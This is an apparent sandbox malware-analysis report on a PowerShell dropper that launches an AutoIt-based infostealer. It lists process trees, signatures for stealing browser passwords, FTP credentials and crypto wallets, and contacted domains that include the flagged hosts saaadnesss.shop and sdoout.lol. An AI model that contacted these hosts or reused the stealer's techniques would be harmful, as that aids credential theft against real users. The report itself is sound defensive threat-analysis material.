C:\ProgramData\Microsoft84etwork\...\qmgr.jfm, DOS 18->84 dropped 37 msedge.exe 20->37         started        file6 signatures7 process8 dnsIp9 128 Multi AV Scanner detection for dropped file 22->128 39 cmd.exe 2 22->39         started        78 C:\Users\user\AppData\Local\...\l2xn2zg1.dll, PE32 25->78 dropped 43 cvtres.exe 1 25->43         started        114 104.46.162.225, 443, 50077, 50104 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->114 116 20.110.205.119, 443, 50076, 50095 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->116 118 19 other IPs or domains 30->118 file10 signatures11 process12 file13 76 C:\Users\user\AppData\Local\...\Stopped.com, PE32 39->76 dropped 132 Drops PE files with a suspicious file extension 39->132 45 Stopped.com 29 39->45         started        49 cmd.exe 1 39->49         started        51 cmd.exe 2 39->51         started        53 9 other processes 39->53 signatures14 process15 dnsIp16 110 sdoout.lol 116.203.14.4, 443, 49804, 49812 HETZNER-ASDE Germany 45->110 112 t.me 149.154.167.99, 443, 49796 TELEGRAMRU United Kingdom 45->112 136 Attempt to bypass Chrome Application-Bound Encryption 45->136 138 Tries to harvest and steal ftp login credentials 45->138 140 Tries to harvest and steal browser information (history, passwords, etc) 45->140 142 Tries to steal Crypto Currency Wallets 45->142 55 msedge.exe 45->55         started        58 msedge.exe 45->58         started        60 chrome.exe 45->60         started        63 cmd.exe 45->63         started        signatures17 process18 dnsIp19 130 Monitors registry run keys for changes 55->130 65 msedge.exe 55->65         started        67 msedge.exe 58->67         started        106 192.168.2.5, 443, 49329, 49396 unknown unknown 60->106 108 239.255.255.250 unknown Reserved 60->108 69 chrome.exe 60->69         started        72 conhost.exe 63->72         started        74 timeout.exe 63->74         started        signatures20 process21 dnsIp22 92 plus.l.google.com 142.250.184.206, 443, 49907 GOOGLEUS United States 69->92 94 www.google.com 142.250.184.228, 443, 49876, 49880 GOOGLEUS United States 69->94 96 2 other IPs or domains 69->96

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    over.ps13%VirustotalBrowse
    over.ps13%ReversingLabsWin32.Dropper.Generic

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe24%ReversingLabsWin32.Spyware.Generic

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://saaadnesss.shop/connect100%Avira URL Cloudmalware
    http://saaadnesss.shop100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    chrome.cloudflare-dns.com
    		162.159.61.3
    		truefalse
      		high
      sdoout.lol
      		116.203.14.4
      		truetrue
        		unknown
        plus.l.google.com
        		142.250.184.206
        		truefalse
          		high
          raw.githubusercontent.com
          		185.199.109.133
          		truefalse
            		high
            t.me
            		149.154.167.99
            		truefalse
              		high
              ssl.bingadsedgeextension-prod-europe.azurewebsites.net
              		94.245.104.56
              		truefalse
                		high
                s-part-0017.t-0009.t-msedge.net
                		13.107.246.45
                		truefalse
                  		high
                  play.google.com
                  		142.250.186.46
                  		truefalse
                    		high
                    sb.scorecardresearch.com
                    		18.244.18.27
                    		truefalse
                      		high
                      www.google.com
                      		142.250.184.228
                      		truefalse
                        		high
                        ifconfig.me
                        		34.160.111.145
                        		truefalse
                          		high
                          saaadnesss.shop
                          		185.121.235.167
                          		truetrue
                            		unknown
                            googlehosted.l.googleusercontent.com
                            		142.250.186.65
                            		truefalse
                              		high
                              assets.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                GeVuzPdhfiKPHBwrLx.GeVuzPdhfiKPHBwrLx
                                		unknown
                                		unknownfalse
                                  		unknown
                                  c.msn.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    ntp.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      clients2.googleusercontent.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        bzib.nelreports.net
                                        		unknown
                                        		unknownfalse
                                          		high
                                          apis.google.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            api.msn.com
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              https://saaadnesss.shop/connecttrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://ifconfig.me/ipfalse
                                                		high
                                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735660768164&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                  		high
                                                  https://t.me/w211etfalse
                                                    		high

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabchrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, aie3w4.17.dr, Web Data.31.dr, fcbaaa.17.drfalse
                                                      		high
                                                      https://google-ohttp-relay-join.fastly-edge.com/(chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, aie3w4.17.dr, Web Data.31.dr, fcbaaa.17.drfalse
                                                          		high
                                                          https://google-ohttp-relay-join.fastly-edge.com//chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://google-ohttp-relay-join.fastly-edge.com/2chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://google-ohttp-relay-join.fastly-edge.com/7chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ntp.msn.com/0000003.log.31.drfalse
                                                                    		high
                                                                    https://ntp.msn.com/_defaultQuotaManager.31.drfalse
                                                                      		high
                                                                      http://anglebug.com/4633chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://anglebug.com/7382chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.k6fcj5.17.drfalse
                                                                            		high
                                                                            https://issuetracker.google.com/284462263msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://google-ohttp-relay-join.fastly-edge.com/:chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://google-ohttp-relay-join.fastly-edge.com/9chrome.exe, 00000014.00000003.2516423821.0000180801784000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://deff.nelreports.net/api/report?cat=msn2cc80dabc69f58b6_0.31.drfalse
                                                                                    		high
                                                                                    https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.31.drfalse
                                                                                      		high
                                                                                      https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://polymer.github.io/AUTHORS.txtchrome.exe, 00000014.00000003.2485998634.0000180801034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486741039.0000180801278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483659881.00001808010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486338332.0000180800438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483813623.00001808010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2484968227.00001808009BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2485964191.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483719913.000018080100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483120374.0000180800FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483691316.0000180801120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://docs.google.com/manifest.json0.31.drfalse
                                                                                            		high
                                                                                            https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000014.00000003.2482529350.0000180801058000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://anglebug.com/7714chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://duckduckgo.com/chrome_newtabNstatechrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000014.00000003.2486741039.0000180801278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486338332.0000180800438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2168196149.0000024110070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://drive.google.com/?lfhs=2chrome.exe, 00000014.00000003.2522028034.0000180801BB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/6248chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://drive.google.com/?lfhs=2ation.Resultchrome.exe, 00000014.00000003.2522028034.0000180801BB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000014.00000003.2498134058.000018080148C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://anglebug.com/6929chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://anglebug.com/5281chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2133357506.0000024100001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://issuetracker.google.com/255411748msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://anglebug.com/7246chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://anglebug.com/7369chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2133357506.0000024100228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://anglebug.com/7489chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://duckduckgo.com/?q=chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2133357506.0000024100228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://chrome.google.com/webstorechrome.exe, 00000014.00000003.2480335285.0000180800D7C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2626560437.00007A640017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000002.2786304098.000065100017C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://cdnjs.cloudflare.com/ajax/libs/mathjax/service_worker_bin_prod.js.31.dr, offscreendocument_main.js.31.drfalse
                                                                                                                                          		high
                                                                                                                                          https://drive-daily-2.corp.google.com/manifest.json0.31.drfalse
                                                                                                                                            		high
                                                                                                                                            http://polymer.github.io/PATENTS.txtchrome.exe, 00000014.00000003.2485998634.0000180801034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486741039.0000180801278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483659881.00001808010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486338332.0000180800438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483813623.00001808010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2484968227.00001808009BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2485964191.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483719913.000018080100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483120374.0000180800FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483691316.0000180801120000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://contoso.com/Iconpowershell.exe, 00000000.00000002.2168196149.0000024110070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.31.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aie3w4.17.dr, Web Data.31.dr, fcbaaa.17.drfalse
                                                                                                                                                      		high
                                                                                                                                                      http://crl.ver)svchost.exe, 00000015.00000002.3267887217.00000239C8C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://www.autoitscript.com/autoit3/XStopped.com, 00000011.00000000.2154994355.0000000000455000.00000002.00000001.01000000.0000000A.sdmp, Stopped.com.6.dr, Born.13.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://issuetracker.google.com/161903006msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.ecosia.org/newtab/fcbaaa.17.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://drive-daily-1.corp.google.com/manifest.json0.31.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.youtube.com/chrome.exe, 00000014.00000003.2520909762.0000180801C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2133357506.0000024100228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://drive-daily-5.corp.google.com/manifest.json0.31.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://duckduckgo.com/favicon.icochrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://plus.google.comchromecache_490.22.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/3078chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/7553chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/5375chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.32.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://chromewebstore.google.com/https://chrome.google.com/webstorezdmsedge.exe, 00000019.00000002.2626560437.00007A640017C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/5371chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://anglebug.com/4722chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://assets.msn.com/statics/icons/favicon_newtabpage.pngjson[1].json.17.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000019.00000003.2608104825.00007A640026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2608280826.00007A6400270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607484546.00007A6400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://permanently-removed.invalid/LogoutYxABmsedge.exe, 0000001D.00000003.2715398423.0000651000270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
